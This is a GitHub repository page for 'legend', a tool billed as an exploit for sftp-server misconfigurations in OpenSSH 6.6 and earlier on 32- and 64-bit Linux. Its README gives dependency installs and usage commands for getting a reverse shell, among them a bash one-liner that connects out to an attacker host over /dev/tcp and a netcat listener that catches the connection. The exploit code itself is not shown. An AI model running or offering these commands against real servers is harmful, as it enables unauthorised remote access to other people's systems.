Skip to content
/ legend Public

OpenSSH <= 6.6 SFTP (sftp-server) misconfiguration exploit

License

AGPL-3.0 license
1 star 2 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

v-a-c-u-u-m/legend

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
.gitattributes
.gitattributes
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
legend.py
legend.py
 
 

Repository files navigation

Legend

OpenSSH <= 6.6 SFTP (sftp-server) misconfiguration exploit for 32/64 bits Linux

Dependencies

pip3 install paramiko

pip3 install --upgrade git+https://github.com/arthaud/python3-pwntools.git

Usage

Reverse shell with python

./legend.py -r $sftp_ip -p $sftp_port -u $sftp_user -P $sftp_pass -b "$your_ip $your_port"

Reverse shell with bash

./legend.py -r 1.1.1.1 -p 22 -u user -P pass -c "/bin/bash -pi >& /dev/tcp/2.2.2.2/443 0>&1"

Listening on $your_port

sudo nc -nlvp 443

About

OpenSSH <= 6.6 SFTP (sftp-server) misconfiguration exploit

Resources

Readme

License

AGPL-3.0 license
Activity

Stars

1 star

Watchers

1 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages